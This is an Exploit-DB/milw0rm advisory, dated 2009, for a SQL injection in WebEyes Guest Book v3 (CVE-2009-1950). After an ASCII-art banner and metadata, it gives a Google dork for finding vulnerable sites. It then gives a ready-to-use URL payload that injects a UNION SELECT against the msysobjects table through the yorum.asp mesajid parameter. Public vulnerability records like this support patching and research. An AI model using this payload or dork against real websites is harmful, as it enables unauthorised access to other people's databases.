WebEyes Guest Book 3 - 'yorum.asp?mesajid' SQL Injection

Author: Bl@ckbe@rD
type: webapps
platform: asp
port: 
date_added: 2009-06-01  
date_updated:   
verified: 1  
codes: OSVDB-54867;CVE-2009-1950  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8859.txt  
000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000


(
[+] Script               : WEBEYES GUEST BOOK v.3

[+] Exploit Type         : Remote sql injection exploit

[+] Google Dork          : intitle:WEBEYES GUEST BOOK     inurl:.asp?id=

[+] Contact              : blackbeard-sql A.T hotmail.fr

--//--> Exploit :

Remote sql injection Exploit :

http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects

[peace xD]

# milw0rm.com [2009-06-02]